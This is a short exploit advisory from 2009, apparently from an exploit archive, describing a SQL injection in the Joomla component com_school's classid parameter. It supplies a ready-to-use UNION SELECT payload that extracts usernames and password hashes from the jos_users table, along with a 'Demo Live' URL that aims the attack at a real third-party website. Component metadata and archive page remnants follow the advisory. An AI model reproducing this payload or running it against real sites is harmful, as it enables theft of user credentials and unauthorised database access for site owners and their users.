joomlaschool-sql.txt

Posted on 08 June 2009
----------------------------------------------------------------------
Joomla Component com_school (classid) SQL injection Vulnerability
----------------------------------------------------------------------

###################################################
[+] Author        :  Chip D3 Bi0s
[+] Email         :  chipdebios[alt+64]gmail.com
[+] Group         :  LatinHackTeam
[+] Vulnerability :  SQL injection
###################################################

________________________________________________________

Example:

http://localHost/path/index.php?option=com_school&Itemid=null&func=showclass&classid=<sql Code>

<Sql Code>:
-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*


Demo Live:
http://www.mariadecervello.com/index.php?option=com_school&Itemid=null&func=showclass&classid=-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*


+++++++++++++++++++++++++++++++++
[!] Produced in South America
------------------------------------


<name>school</name>
<creationDate>18 July 2006</creationDate>
<author>Soner (pisdoktor) Ekici - Alex Chaparro</author>
<copyright>
This component in released under the GNU/GPL License
</copyright>
<authorEmail>damj3t@gmail.com</authorEmail>
<authorUrl>www.joomla.cl</authorUrl>
<version>1.4</version>
TOP
Malware :

None in database
Last 20
Exploits :

Last 20